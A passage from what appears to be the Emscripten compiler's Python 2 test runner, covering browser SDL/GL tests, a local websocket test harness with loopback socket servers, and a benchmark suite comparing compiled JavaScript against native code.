self.btest('sdl_maprgba.c', reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=' + str(1024*1024*8)])
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png'])
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds'])
def test_s3tc_crunch(self):
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--pre-run', '--crunch', '--preload', 'ship.dds', 'bloom.dds', 'water.dds'], stdout=open('pre.js', 'w')).communicate()
assert os.stat('test.data').st_size < 0.5*(os.stat('ship.dds').st_size+os.stat('bloom.dds').st_size+os.stat('water.dds').st_size), 'Compressed should be smaller than dds'
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'pre.js'])
def test_s3tc_crunch_split(self): # load several datafiles/outputs of file packager
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
Popen([PYTHON, FILE_PACKAGER, 'asset_a.data', '--pre-run', '--crunch', '--preload', 'ship.dds', 'bloom.dds'], stdout=open('asset_a.js', 'w')).communicate()
Popen([PYTHON, FILE_PACKAGER, 'asset_b.data', '--pre-run', '--crunch', '--preload', 'water.dds'], stdout=open('asset_b.js', 'w')).communicate()
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'asset_a.js', '--pre-js', 'asset_b.js'])
def test_aniso(self):
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds'])
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png')
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png')
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png')
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png')
def test_runtimelink(self):
return self.skip('shared libs are deprecated')
main, supp = self.setup_runtimelink_test()
open(self.in_dir('supp.cpp'), 'w').write(supp)
Popen([PYTHON, EMCC, self.in_dir('supp.cpp'), '-o', 'supp.js', '-s', 'LINKABLE=1', '-s', 'NAMED_GLOBALS=1', '-s', 'BUILD_AS_SHARED_LIB=2', '-O2', '-s', 'ASM_JS=0']).communicate()
shutil.move(self.in_dir('supp.js'), self.in_dir('supp.so'))
self.btest(main, args=['-s', 'LINKABLE=1', '-s', 'NAMED_GLOBALS=1', '-s', 'RUNTIME_LINKED_LIBS=["supp.so"]', '-DBROWSER=1', '-O2', '-s', 'ASM_JS=0'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency();
Module.print('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js'])
def test_worker_api(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]']).communicate()
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
pids_to_clean = []
def clean_pids(self):
import signal, errno
def pid_exists(pid):
try:
# NOTE: may just kill the process in Windows
os.kill(pid, 0)
except OSError, e:
return e.errno == errno.EPERM
else:
return True
def kill_pids(pids, sig):
for pid in pids:
if not pid_exists(pid):
break
print '[killing %d]' % pid
try:
os.kill(pid, sig)
print '[kill succeeded]'
except:
print '[kill fail]'
# ask nicely (to try and catch the children)
kill_pids(browser.pids_to_clean, signal.SIGTERM)
time.sleep(1)
# extreme prejudice, may leave children
kill_pids(browser.pids_to_clean, signal.SIGKILL)
browser.pids_to_clean = []
# Runs a websocket server at a specific port. port is the true tcp socket we forward to, port+1 is the websocket one
class WebsockHarness:
def __init__(self, port, server_func=None, no_server=False):
self.port = port
self.server_func = server_func
self.no_server = no_server
def __enter__(self):
import socket, websockify
if not self.no_server:
def server_func(q):
q.put(None) # No sub-process to start
ssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssock.bind(("127.0.0.1", self.port))
ssock.listen(2)
while True:
csock, addr = ssock.accept()
print "Connection from %s" % repr(addr)
csock.send("te\x01\xff\x79st\x02")
server_func = self.server_func or server_func
server_queue = multiprocessing.Queue()
self.server = multiprocessing.Process(target=server_func, args=(server_queue,))
self.server.start()
browser.pids_to_clean.append(self.server.pid)
while True:
if not server_queue.empty():
spid = server_queue.get()
if spid:
browser.pids_to_clean.append(spid)
break
time.sleep(0.1)
print '[Socket server on processes %s]' % str(browser.pids_to_clean[-2:])
def websockify_func(wsp): wsp.start_server()
print >> sys.stderr, 'running websockify on %d, forward to tcp %d' % (self.port+1, self.port)
wsp = websockify.WebSocketProxy(verbose=True, listen_port=self.port+1, target_host="127.0.0.1", target_port=self.port, run_once=True)
self.websockify = multiprocessing.Process(target=websockify_func, args=(wsp,))
self.websockify.start()
browser.pids_to_clean.append(self.websockify.pid)
print '[Websockify on processes %s]' % str(browser.pids_to_clean[-2:])
def __exit__(self, *args, **kwargs):
if self.websockify.is_alive():
self.websockify.terminate()
self.websockify.join()
# always run these tests last
# make sure to use different ports in each one because it takes a while for the processes to be cleaned up
def test_websockets(self):
try:
with self.WebsockHarness(8990):
self.btest('websockets.c', expected='571')
finally:
self.clean_pids()
def test_websockets_partial(self):
def partial(q):
import socket
q.put(None) # No sub-process to start
ssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssock.bind(("127.0.0.1", 8990))
ssock.listen(2)
while True:
csock, addr = ssock.accept()
print "Connection from %s" % repr(addr)
csock.send("\x09\x01\x02\x03\x04\x05\x06\x07\x08\x09")
csock.send("\x08\x01\x02\x03\x04\x05\x06\x07\x08")
csock.send("\x07\x01\x02\x03\x04\x05\x06\x07")
csock.send("\x06\x01\x02\x03\x04\x05\x06")
csock.send("\x05\x01\x02\x03\x04\x05")
csock.send("\x04\x01\x02\x03\x04")
csock.send("\x03\x01\x02\x03")
csock.send("\x02\x01\x02")
csock.send("\x01\x01")
try:
with self.WebsockHarness(8990, partial):
self.btest('websockets_partial.c', expected='165')
finally:
self.clean_pids()
def make_relay_server(self, port1, port2):
def relay_server(q):
print >> sys.stderr, 'creating relay server on ports %d,%d' % (port1, port2)
proc = Popen([PYTHON, path_from_root('tests', 'socket_relay.py'), str(port1), str(port2)])
q.put(proc.pid)
proc.communicate()
return relay_server
def test_websockets_bi(self):
for datagram in [0,1]:
for fileops in [0,1]:
try:
print >> sys.stderr, 'test_websocket_bi datagram %d, fileops %d' % (datagram, fileops)
with self.WebsockHarness(8992, self.make_relay_server(8992, 8994)):
with self.WebsockHarness(8994, no_server=True):
Popen([PYTHON, EMCC, path_from_root('tests', 'websockets_bi_side.c'), '-o', 'side.html', '-DSOCKK=8995', '-DTEST_DGRAM=%d' % datagram]).communicate()
self.btest('websockets_bi.c', expected='2499', args=['-DSOCKK=8993', '-DTEST_DGRAM=%d' % datagram, '-DTEST_FILE_OPS=%s' % fileops])
finally:
self.clean_pids()
def test_websockets_bi_listen(self):
try:
with self.WebsockHarness(6992, self.make_relay_server(6992, 6994)):
with self.WebsockHarness(6994, no_server=True):
Popen([PYTHON, EMCC, path_from_root('tests', 'websockets_bi_side.c'), '-o', 'side.html', '-DSOCKK=6995']).communicate()
self.btest('websockets_bi_listener.c', expected='2499', args=['-DSOCKK=6993'])
finally:
self.clean_pids()
def test_websockets_gethostbyname(self):
try:
with self.WebsockHarness(7000):
self.btest('websockets_gethostbyname.c', expected='571', args=['-O2'])
finally:
self.clean_pids()
def test_websockets_bi_bigdata(self):
try:
with self.WebsockHarness(3992, self.make_relay_server(3992, 3994)):
with self.WebsockHarness(3994, no_server=True):
Popen([PYTHON, EMCC, path_from_root('tests', 'websockets_bi_side_bigdata.c'), '-o', 'side.html', '-DSOCKK=3995', '-s', 'SOCKET_DEBUG=0', '-I' + path_from_root('tests')]).communicate()
self.btest('websockets_bi_bigdata.c', expected='0', args=['-DSOCKK=3993', '-s', 'SOCKET_DEBUG=0', '-I' + path_from_root('tests')])
finally:
self.clean_pids()
def test_websockets_select_server_down(self):
def closedServer(q):
import socket
q.put(None) # No sub-process to start
ssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssock.bind(("127.0.0.1", 8994))
try:
with self.WebsockHarness(8994, closedServer):
self.btest('websockets_select.c', expected='266')
finally:
self.clean_pids()
def test_websockets_select_server_closes_connection(self):
def closingServer(q):
import socket
q.put(None) # No sub-process to start
ssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssock.bind(("127.0.0.1", 8994))
ssock.listen(2)
while True:
csock, addr = ssock.accept()
print "Connection from %s" % repr(addr)
csock.send("1234567")
csock.close()
try:
with self.WebsockHarness(8994, closingServer):
self.btest('websockets_select_server_closes_connection.c', expected='266')
finally:
self.clean_pids()
def test_websockets_select_server_closes_connection_rw(self):
def closingServer_rw(q):
import socket
q.put(None) # No sub-process to start
ssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssock.bind(("127.0.0.1", 8998))
ssock.listen(2)
while True:
csock, addr = ssock.accept()
print "Connection from %s" % repr(addr)
readArray = bytearray(10)
#readBuffer = buffer(readArray)
bytesRead = 0
# Let the client start to write data
while (bytesRead < 10):
(readBytes, address) = csock.recvfrom_into( readArray, 10 )
bytesRead += readBytes
print "server: 10 bytes read"
# Now we write a message on our own ...
csock.send("0123456789")
print "server: 10 bytes written"
# And immediately close the connection
csock.close()
print "server: connection closed"
try:
with self.WebsockHarness(8998, closingServer_rw):
self.btest('websockets_select_server_closes_connection_rw.c', expected='266')
finally:
self.clean_pids()
def test_enet(self):
try_delete(self.in_dir('enet'))
shutil.copytree(path_from_root('tests', 'enet'), self.in_dir('enet'))
pwd = os.getcwd()
os.chdir(self.in_dir('enet'))
Popen([PYTHON, path_from_root('emconfigure'), './configure']).communicate()
Popen([PYTHON, path_from_root('emmake'), 'make']).communicate()
enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I'+path_from_root('tests', 'enet', 'include')]
os.chdir(pwd)
Popen([PYTHON, EMCC, path_from_root('tests', 'enet_server.c'), '-o', 'server.html'] + enet).communicate()
try:
with self.WebsockHarness(1234, self.make_relay_server(1234, 1236)):
with self.WebsockHarness(1236, no_server=True):
self.btest('enet_client.c', expected='0', args=enet)
finally:
self.clean_pids()
elif 'benchmark' in str(sys.argv):
# Benchmarks. Run them with argument |benchmark|. To run a specific test, do
# |benchmark.test_X|.
fingerprint = [time.asctime()]
try:
fingerprint.append('em: ' + Popen(['git', 'show'], stdout=PIPE).communicate()[0].split('\n')[0])
except:
pass
try:
d = os.getcwd()
os.chdir(os.path.expanduser('~/Dev/mozilla-central'))
fingerprint.append('sm: ' + filter(lambda line: 'changeset' in line,
Popen(['hg', 'tip'], stdout=PIPE).communicate()[0].split('\n'))[0])
except:
pass
finally:
os.chdir(d)
fingerprint.append('llvm: ' + LLVM_ROOT)
print 'Running Emscripten benchmarks... [ %s ]' % ' | '.join(fingerprint)
sys.argv = filter(lambda x: x != 'benchmark', sys.argv)
assert(os.path.exists(CLOSURE_COMPILER))
try:
index = SPIDERMONKEY_ENGINE.index("options('strict')")
SPIDERMONKEY_ENGINE = SPIDERMONKEY_ENGINE[:index-1] + SPIDERMONKEY_ENGINE[index+1:] # closure generates non-strict
except:
pass
Building.COMPILER = CLANG
# Pick the JS engine to benchmark. If you specify one, it will be picked. For example, python tests/runner.py benchmark SPIDERMONKEY_ENGINE
JS_ENGINE = JS_ENGINES[0]
for i in range(1, len(sys.argv)):
arg = sys.argv[i]
if not arg.startswith('benchmark.test_'):
JS_ENGINE = eval(arg)
sys.argv[i] = None
sys.argv = filter(lambda arg: arg is not None, sys.argv)
print 'Benchmarking JS engine:', ' '.join(JS_ENGINE)
Building.COMPILER_TEST_OPTS = []
TEST_REPS = 2
TOTAL_TESTS = 8
# standard arguments for timing:
# 0: no runtime, just startup
# 1: very little runtime
# 2: 0.5 seconds
# 3: 1 second
# 4: 5 seconds
# 5: 10 seconds
DEFAULT_ARG = '4'
tests_done = 0
total_times = map(lambda x: 0., range(TOTAL_TESTS))
total_native_times = map(lambda x: 0., range(TOTAL_TESTS))
class benchmark(RunnerCore):
def print_stats(self, times, native_times, last=False, reps=TEST_REPS):
if reps == 0:
print '(no reps)'
return
mean = sum(times)/len(times)
squared_times = map(lambda x: x*x, times)
mean_of_squared = sum(squared_times)/len(times)
std = math.sqrt(mean_of_squared - mean*mean)
sorted_times = times[:]
sorted_times.sort()
median = sum(sorted_times[len(sorted_times)/2 - 1:len(sorted_times)/2 + 1])/2
mean_native = sum(native_times)/len(native_times)
squared_native_times = map(lambda x: x*x, native_times)
mean_of_squared_native = sum(squared_native_times)/len(native_times)
std_native = math.sqrt(mean_of_squared_native - mean_native*mean_native)
sorted_native_times = native_times[:]
sorted_native_times.sort()
median_native = sum(sorted_native_times[len(sorted_native_times)/2 - 1:len(sorted_native_times)/2 + 1])/2
final = mean / mean_native
if last:
norm = 0
for i in range(len(times)):
norm += times[i]/native_times[i]
norm /= len(times)
print
print ' JavaScript: %.3f Native: %.3f Ratio: %.3f Normalized ratio: %.3f' % (mean, mean_native, final, norm)
return
print
print ' JavaScript: mean: %.3f (+-%.3f) secs median: %.3f range: %.3f-%.3f (noise: %3.3f%%) (%d runs)' % (mean, std, median, min(times), max(times), 100*std/mean, reps)
print ' Native : mean: %.3f (+-%.3f) secs median: %.3f range: %.3f-%.3f (noise: %3.3f%%) JS is %.2f X slower' % (mean_native, std_native, median_native, min(native_times), max(native_times), 100*std_native/mean_native, final)
def do_benchmark(self, name, src, expected_output='FAIL', args=[], emcc_args=[], native_args=[], shared_args=[], force_c=False, reps=TEST_REPS, native_exec=None, output_parser=None, args_processor=None):
args = args or [DEFAULT_ARG]
if args_processor: args = args_processor(args)
dirname = self.get_dir()
filename = os.path.join(dirname, name + '.c' + ('' if force_c else 'pp'))
f = open(filename, 'w')
f.write(src)
f.close()
final_filename = os.path.join(dirname, name + '.js')
open('hardcode.py', 'w').write('''
def process(filename):
js = open(filename).read()
replaced = js.replace("run();", "run(%s.concat(Module[\\"arguments\\"]));")
assert js != replaced
open(filename, 'w').write(replaced)
import sys
process(sys.argv[1])
''' % str(args[:-1]) # do not hardcode in the last argument, the default arg
)
try_delete(final_filename)
output = Popen([PYTHON, EMCC, filename, #'-O3',
'-O2', '-s', 'DOUBLE_MODE=0', '-s', 'PRECISE_I64_MATH=0',
'--llvm-lto', '3', '--memory-init-file', '0', '--js-transform', 'python hardcode.py',
'-s', 'TOTAL_MEMORY=128*1024*1024',
'--closure', '1',
#'-g',
'-o', final_filename] + shared_args + emcc_args, stdout=PIPE, stderr=self.stderr_redirect).communicate()
assert os.path.exists(final_filename), 'Failed to compile file: ' + output[0]
# Run JS
global total_times, tests_done
times = []
for i in range(reps):
start = time.time()
js_output = run_js(final_filename, engine=JS_ENGINE, args=args, stderr=PIPE, full_output=True)
if i == 0 and 'uccessfully compiled asm.js code' in js_output:
if 'asm.js link error' not in js_output:
print "[%s was asm.js'ified]" % name
if not output_parser:
curr = time.time()-start
else:
curr = output_parser(js_output)
times.append(curr)
total_times[tests_done] += curr
if i == 0:
# Sanity check on output
self.assertContained(expected_output, js_output)
# Run natively
if not native_exec:
self.build_native(filename, shared_args + native_args)
else:
shutil.copyfile(native_exec, filename + '.native')
shutil.copymode(native_exec, filename + '.native')
global total_native_times
native_times = []
for i in range(reps):
start = time.time()
native_output = self.run_native(filename, args)
if i == 0:
# Sanity check on output
self.assertContained(expected_output, native_output)
if not output_parser:
curr = time.time()-start
else:
curr = output_parser(native_output)
native_times.append(curr)
total_native_times[tests_done] += curr
self.print_stats(times, native_times, reps=reps)
#tests_done += 1
#if tests_done == TOTAL_TESTS:
# print 'Total stats:',
# self.print_stats(total_times, total_native_times, last=True)
def test_primes(self):
src = r'''
#include<stdio.h>
#include<math.h>
int main(int argc, char **argv) {
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: arg = 33000; break;
case 2: arg = 130000; break;
case 3: arg = 220000; break;
case 4: arg = 610000; break;
case 5: arg = 1010000; break;
default: printf("error: %d\\n", arg); return -1;
}
int primes = 0, curri = 2;
while (primes < arg) {
int ok = true;
for (int j = 2; j < sqrtf(curri); j++) {
if (curri % j == 0) {
ok = false;
break;
}
}
if (ok) {
primes++;
}
curri++;
}
printf("lastprime: %d.\n", curri-1);
return 0;
}
'''
self.do_benchmark('primes', src, 'lastprime:')
def test_memops(self):
src = '''
#include<stdio.h>
#include<string.h>
#include<stdlib.h>
int main(int argc, char **argv) {
int N, M;
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: N = 1024*1024; M = 55; break;
case 2: N = 1024*1024; M = 400; break;
case 3: N = 1024*1024; M = 800; break;
case 4: N = 1024*1024; M = 4000; break;
case 5: N = 1024*1024; M = 8000; break;
default: printf("error: %d\\n", arg); return -1;
}
int final = 0;
char *buf = (char*)malloc(N);
for (int t = 0; t < M; t++) {
for (int i = 0; i < N; i++)
buf[i] = (i + final)%256;
for (int i = 0; i < N; i++)
final += buf[i] & 1;
final = final % 1000;
}
printf("final: %d.\\n", final);
return 0;
}
'''
self.do_benchmark('memops', src, 'final:')
def zzztest_files(self):
src = r'''
#include<stdio.h>
#include<stdlib.h>
#include<assert.h>
#include <unistd.h>
int main() {
int N = 100;
int M = 1000;
int K = 1000;
unsigned char *k = (unsigned char*)malloc(K+1), *k2 = (unsigned char*)malloc(K+1);
for (int i = 0; i < K; i++) {
k[i] = (i % 250) + 1;
}
k[K] = 0;
char buf[100];
for (int i = 0; i < N; i++) {
sprintf(buf, "/dev/shm/file-%d.dat", i);
FILE *f = fopen(buf, "w");
for (int j = 0; j < M; j++) {
fwrite(k, 1, (j % K) + 1, f);
}
fclose(f);
}
for (int i = 0; i < N; i++) {
sprintf(buf, "/dev/shm/file-%d.dat", i);
FILE *f = fopen(buf, "r");
for (int j = 0; j < M; j++) {
fread(k2, 1, (j % K) + 1, f);
}
fclose(f);
for (int j = 0; j < K; j++) {
assert(k[j] == k2[j]);
}
unlink(buf);
}
printf("ok");
return 0;
}
'''
self.do_benchmark(src, 'ok')
def test_copy(self):
src = r'''
#include<stdio.h>
struct vec {
int x, y, z;
int r, g, b;
vec(int x_, int y_, int z_, int r_, int g_, int b_) : x(x_), y(y_), z(z_), r(r_), g(g_), b(b_) {}
static vec add(vec a, vec b) {
return vec(a.x+b.x, a.y+b.y, a.z+b.z, a.r+b.r, a.g+b.g, a.b+b.b);
}
void norm() {
x %= 1024;
y %= 1024;
z %= 1024;
r %= 1024;
b %= 1024;
g %= 1024;
}
int sum() { return x + y + z + r + g + b; }
};
int main(int argc, char **argv) {
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: arg = 75; break;
case 2: arg = 625; break;
case 3: arg = 1250; break;
case 4: arg = 5*1250; break;
case 5: arg = 10*1250; break;
default: printf("error: %d\\n", arg); return -1;
}
int total = 0;
for (int i = 0; i < arg; i++) {
for (int j = 0; j < 50000; j++) {
vec c(i, i+i%10, j*2, i%255, j%120, i%15);
vec d(j+i%10, j*2, j%255, i%120, j%15, j);
vec e = c;
c.norm();
d.norm();
vec f = vec::add(c, d);
f = vec::add(e, f);
f.norm();
f = vec::add(d, f);
total += f.sum() % 100;
total %= 10240;
}
}
printf("sum:%d\n", total);
return 0;
}
'''
self.do_benchmark('copy', src, 'sum:')
def test_fannkuch(self):
src = open(path_from_root('tests', 'fannkuch.cpp'), 'r').read().replace(
'int n = argc > 1 ? atoi(argv[1]) : 0;',
'''
int n;
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: n = 9; break;
case 2: n = 10; break;
case 3: n = 11; break;
case 4: n = 11; break;
case 5: n = 12; break;
default: printf("error: %d\\n", arg); return -1;
}
'''
)
assert 'switch(arg)' in src
self.do_benchmark('fannkuch', src, 'Pfannkuchen(')
def test_corrections(self):
src = r'''
#include<stdio.h>
#include<math.h>
int main(int argc, char **argv) {
int N, M;
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: N = 20000; M = 550; break;
case 2: N = 20000; M = 3500; break;
case 3: N = 20000; M = 7000; break;
case 4: N = 20000; M = 5*7000; break;
case 5: N = 20000; M = 10*7000; break;
default: printf("error: %d\\n", arg); return -1;
}
unsigned int f = 0;
unsigned short s = 0;
for (int t = 0; t < M; t++) {
for (int i = 0; i < N; i++) {
f += i / ((t % 5)+1);
if (f > 1000) f /= (t % 3)+1;
if (i % 4 == 0) f += i * (i % 8 == 0 ? 1 : -1);
s += (short(f)*short(f)) % 256;
}
}
printf("final: %d:%d.\n", f, s);
return 0;
}
'''
self.do_benchmark('corrections', src, 'final:', emcc_args=['-s', 'CORRECT_SIGNS=1', '-s', 'CORRECT_OVERFLOWS=1', '-s', 'CORRECT_ROUNDINGS=1'])
def fasta(self, name, double_rep, emcc_args=[]):
src = open(path_from_root('tests', 'fasta.cpp'), 'r').read().replace('double', double_rep)
src = src.replace(' const size_t n = ( argc > 1 ) ? atoi( argv[1] ) : 512;', '''
int n;
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: n = 19000000/20; break;
case 2: n = 19000000/2; break;
case 3: n = 19000000; break;
case 4: n = 19000000*5; break;
case 5: n = 19000000*10; break;
default: printf("error: %d\\n", arg); return -1;
}
''')
assert 'switch(arg)' in src
self.do_benchmark('fasta', src, '')
def test_fasta_float(self):
self.fasta('fasta_float', 'float')
def test_fasta_double(self):
self.fasta('fasta_double', 'double')
def test_fasta_double_full(self):
self.fasta('fasta_double_full', 'double', emcc_args=['-s', 'DOUBLE_MODE=1'])
def test_skinning(self):
src = open(path_from_root('tests', 'skinning_test_no_simd.cpp'), 'r').read()
self.do_benchmark('skinning', src, 'blah=0.000000')
def test_life(self):
src = open(path_from_root('tests', 'life.c'), 'r').read()
self.do_benchmark('life', src, '''--------------------------------''', shared_args=['-std=c99'], force_c=True)
def test_linpack(self):
def output_parser(output):
return 100.0/float(re.search('Unrolled Double Precision +([\d\.]+) Mflops', output).group(1))
self.do_benchmark('linpack', open(path_from_root('tests', 'linpack.c')).read(), '''Unrolled Double Precision''', force_c=True, output_parser=output_parser)
def test_zzz_java_nbody(self): # tests xmlvm compiled java, including bitcasts of doubles, i64 math, etc.
args = [path_from_root('tests', 'nbody-java', x) for x in os.listdir(path_from_root('tests', 'nbody-java')) if x.endswith('.c')] + \
['-I' + path_from_root('tests', 'nbody-java')]
self.do_benchmark('nbody_java', '', '''Time(s)''',
force_c=True, emcc_args=args + ['-s', 'PRECISE_I64_MATH=1', '--llvm-lto', '2'], native_args=args + ['-lgc', '-std=c99', '-target', 'x86_64-pc-linux-gnu', '-lm'])
def lua(self, benchmark, expected, output_parser=None, args_processor=None):
shutil.copyfile(path_from_root('tests', 'lua', benchmark + '.lua'), benchmark + '.lua')
#shutil.copyfile(path_from_root('tests', 'lua', 'binarytrees.lua'), 'binarytrees.lua')
#shutil.copyfile(path_from_root('tests', 'lua', 'scimark.lua'), 'scimark.lua')
emcc_args = self.get_library('lua', [os.path.join('src', 'lua'), os.path.join('src', 'liblua.a')], make=['make', 'generic'], configure=None) + \
['--embed-file', benchmark + '.lua']
#['--embed-file', 'binarytrees.lua', '--embed-file', 'scimark.lua'] + ['--minify', '0']
shutil.copyfile(emcc_args[0], emcc_args[0] + '.bc')
emcc_args[0] += '.bc'
native_args = self.get_library('lua_native', [os.path.join('src', 'lua'), os.path.join('src', 'liblua.a')], make=['make', 'generic'], configure=None, native=True)
self.do_benchmark('lua_' + benchmark, '', expected,
force_c=True, args=[benchmark + '.lua', DEFAULT_ARG], emcc_args=emcc_args, native_args=native_args, native_exec=os.path.join('building', 'lua_native', 'src', 'lua'),
output_parser=output_parser, args_processor=args_processor)
def test_zzz_lua_scimark(self):
def output_parser(output):
return 100.0/float(re.search('\nSciMark +([\d\.]+) ', output).group(1))
self.lua('scimark', '[small problem sizes]', output_parser=output_parser)
def test_zzz_lua_binarytrees(self):
# js version: ['binarytrees.lua', {0: 0, 1: 9.5, 2: 11.99, 3: 12.85, 4: 14.72, 5: 15.82}[arguments[0]]]
self.lua('binarytrees', 'long lived tree of depth')
def test_zzz_zlib(self):
src = open(path_from_root('tests', 'zlib', 'benchmark.c'), 'r').read()
emcc_args = self.get_library('zlib', os.path.join('libz.a'), make_args=['libz.a']) + \
['-I' + path_from_root('tests', 'zlib')]
native_args = self.get_library('zlib_native', os.path.join('libz.a'), make_args=['libz.a'], native=True) + \
['-I' + path_from_root('tests', 'zlib')]
self.do_benchmark('zlib', src, '''ok.''',
force_c=True, emcc_args=emcc_args, native_args=native_args)
def test_zzz_box2d(self): # Called thus so it runs late in the alphabetical cycle... it is long
src = open(path_from_root('tests', 'box2d', 'Benchmark.cpp'), 'r').read()
js_lib = self.get_library('box2d', [os.path.join('box2d.a')], configure=None)
native_lib = self.get_library('box2d_native', [os.path.join('box2d.a')], configure=None, native=True)
emcc_args = js_lib + ['-I' + path_from_root('tests', 'box2d')]
native_args = native_lib + ['-I' + path_from_root('tests', 'box2d')]
self.do_benchmark('box2d', src, 'frame averages', emcc_args=emcc_args, native_args=native_args)
def test_zzz_bullet(self): # Called thus so it runs late in the alphabetical cycle... it is long
src = open(path_from_root('tests', 'bullet', 'Demos', 'Benchmarks', 'BenchmarkDemo.cpp'), 'r').read() + \
open(path_from_root('tests', 'bullet', 'Demos', 'Benchmarks', 'main.cpp'), 'r').read()
js_lib = self.get_library('bullet', [os.path.join('src', '.libs', 'libBulletDynamics.a'),
os.path.join('src', '.libs', 'libBulletCollision.a'),
os.path.join('src', '.libs', 'libLinearMath.a')],
configure_args=['--disable-demos','--disable-dependency-tracking'])
native_lib = self.get_library('bullet_native', [os.path.join('src', '.libs', 'libBulletDynamics.a'),
os.path.join('src', '.libs', 'libBulletCollision.a'),
os.path.join('src', '.libs', 'libLinearMath.a')],
configure_args=['--disable-demos','--disable-dependency-tracking'],
native=True)
emcc_args = js_lib + ['-I' + path_from_root('tests', 'bullet', 'src'),
'-I' + path_from_root('tests', 'bullet', 'Demos', 'Benchmarks'),
'-s', 'DEAD_FUNCTIONS=["__ZSt9terminatev"]']
native_args = native_lib + ['-I' + path_from_root('tests', 'bullet', 'src'),
'-I' + path_from_root('tests', 'bullet', 'Demos', 'Benchmarks')]
self.do_benchmark('bullet', src, '\nok.\n', emcc_args=emcc_args, native_args=native_args)
elif 'sanity' in str(sys.argv):
# Run some sanity checks on the test runner and emcc.
